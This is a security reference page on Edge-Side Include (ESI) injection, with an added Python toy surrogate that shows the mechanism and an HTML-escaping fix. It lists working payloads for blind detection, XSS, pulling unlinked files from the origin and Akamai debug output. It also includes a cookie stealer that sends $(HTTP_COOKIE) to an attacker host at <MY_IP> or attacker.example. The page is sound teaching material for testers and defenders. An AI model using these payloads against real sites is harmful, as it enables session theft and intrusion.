ESI

Edge-Side Includes.

Edge-Side Includes (ESI) is a markup language for assembling a web page from content fragments that are cached and refreshed independently. Special tags such as <esi:include> are placed in the HTML returned by the origin; an ESI-aware edge server (a CDN node or an advanced reverse proxy, collectively called an HTTP surrogate) interprets them before the page reaches the browser, fetches each fragment and splices it into the response. This lets the parts of a dynamic page with different lifetimes be cached separately.

Edge-Side Include Injection occurs when an attacker gets ESI tags of their own reflected into the HTTP response, typically through a parameter the application echoes back unescaped. The root cause is that the surrogate cannot validate the origin of an ESI tag: anything in the body that parses as ESI is processed, whether the application developer wrote it or a user did. Because the tags are executed by the edge, with the edge's network position and the client's request context (cookies are exposed as ESI variables), the impact goes beyond ordinary reflected XSS.

The response header Surrogate-Control: content="ESI/1.0" is a hint that ESI is in use, but it is often absent or stripped before the response leaves the edge, so detection is usually blind: inject an <esi:include> pointing at a host you control and watch for the surrogate's callback.

Basic detection (blind: an inbound request on <MY_IP> proves the surrogate processed the tag)

<esi:include src="http://<MY_IP>/"/>

XSS exploitation example (the fetched fragment is spliced into the page as-is, so it runs in the victim's origin)

<esi:include src="http://<MY_IP>/<XSSPAYLOAD.html>"/>

Cookie stealer (bypasses the HttpOnly flag: the surrogate, not the browser, expands $(HTTP_COOKIE) into the request URL)

<esi:include src="http://<MY_IP>/cookie_stealer.php?c=$(HTTP_COOKIE)"/>
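The following is an added example, not code from the original page or from any CDN or proxy vendor: a toy ESI surrogate in Python that expands <esi:include> and the $(HTTP_COOKIE) variable, wired to a constructed in-memory "network". It shows the mechanism behind the detection, XSS and cookie-stealer payloads above, and why the fix belongs at the origin: the surrogate cannot tell an include written by the developer from one reflected out of a query parameter, but HTML-escaping the reflected value means no ESI element can form. The hostnames attacker.example and origin.example, the file names, the renderer functions and the FakeNetwork class are assumptions for illustration.

```python
"""Toy ESI surrogate: why a reflected <esi:include> is processed like a real one.

Added example, not code from the original page or from any CDN/proxy vendor.
Implements just enough of ESI 1.0 to demonstrate the mechanism:
  * <esi:include src="..."/> is replaced by the body fetched from src
  * $(HTTP_COOKIE) inside an attribute is replaced by the client's Cookie header
Relative src values resolve against the page URL, so "supersecret.txt"
is fetched from the origin, not read from the surrogate's disk.
"""
import html
import re
from urllib.parse import urljoin

ESI_INCLUDE = re.compile(
    r'<esi:include\s+src="?(?P<src>[^"\s>]+)"?\s*/?>', re.IGNORECASE)
ESI_VAR = re.compile(r"\$\((?P<name>[A-Z_]+)\)")
PAGE_URL = "https://origin.example/search"  # assumed URL of the page being rendered


def esi_advertised(headers):
    """Passive check: does the response advertise ESI via Surrogate-Control?"""
    return "esi/1.0" in headers.get("Surrogate-Control", "").lower()


def process_esi(body, fetch, request_vars, page_url=PAGE_URL):
    """Expand ESI includes the way an edge surrogate would.

    fetch(url) -> str stands in for the surrogate's outbound HTTP client;
    request_vars maps ESI variable names (e.g. HTTP_COOKIE) to values.
    The surrogate never asks who wrote the tag: anything that parses as
    <esi:include> is fetched and spliced into the page.
    """
    def expand_vars(text):
        return ESI_VAR.sub(lambda m: request_vars.get(m.group("name"), ""), text)

    def splice(m):
        src = expand_vars(m.group("src"))      # $(HTTP_COOKIE) is expanded here
        return fetch(urljoin(page_url, src))   # relative src -> origin URL

    return ESI_INCLUDE.sub(splice, body)


class FakeNetwork:
    """Constructed stand-in for the hosts the surrogate would contact."""
    RESPONSES = {
        "http://attacker.example/xss.html": "<script>alert(1)</script>",
        "https://origin.example/supersecret.txt": "db_password=hunter2",
    }

    def __init__(self):
        self.requests = []                     # what the attacker's listener would see

    def fetch(self, url):
        self.requests.append(url)
        return self.RESPONSES.get(url, "")     # collector endpoints return nothing


def render_vulnerable(query):
    """Origin reflects the search term unescaped; the edge then sees an ESI tag."""
    return f"<html><body><h1>Results for {query}</h1></body></html>"


def render_fixed(query):
    """HTML-escaping '<' and '>' at the origin means no ESI element can form."""
    return f"<html><body><h1>Results for {html.escape(query)}</h1></body></html>"


def serve(query, renderer, cookie="session=abc123"):
    """Origin renders, surrogate post-processes; returns (page, outbound requests)."""
    net = FakeNetwork()
    page = process_esi(renderer(query), net.fetch, {"HTTP_COOKIE": cookie})
    return page, net.requests


if __name__ == "__main__":
    for label, payload in [
        ("detection", '<esi:include src="http://attacker.example/"/>'),
        ("xss", '<esi:include src="http://attacker.example/xss.html"/>'),
        ("cookie", '<esi:include src="http://attacker.example/steal?c=$(HTTP_COOKIE)"/>'),
        ("origin file", '<esi:include src="supersecret.txt"/>'),
    ]:
        page, requests = serve(payload, render_vulnerable)
        print(f"[vulnerable/{label}] surrogate fetched {requests}")
        print(f"    page body: {page}")
    page, requests = serve('<esi:include src="http://attacker.example/"/>', render_fixed)
    print(f"[fixed] surrogate fetched {requests}; body: {page}")
```

Against a real target the FakeNetwork is replaced by an out-of-band listener on <MY_IP>; the cookie case shows why HttpOnly does not help, since the browser never handles the cookie value, the edge substitutes it server-side. The escaping in render_fixed is the application-side control; surrogates that additionally strip or reject ESI tags not emitted by trusted origins add a second layer.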

Include unlinked files from the origin (not LFI as such: the surrogate resolves src as a URL relative to the current page and fetches it from the origin, it does not read the local filesystem)

<esi:include src="supersecret.txt"/>

Akamai only: returns ESI debug information in the response

<esi:debug/>
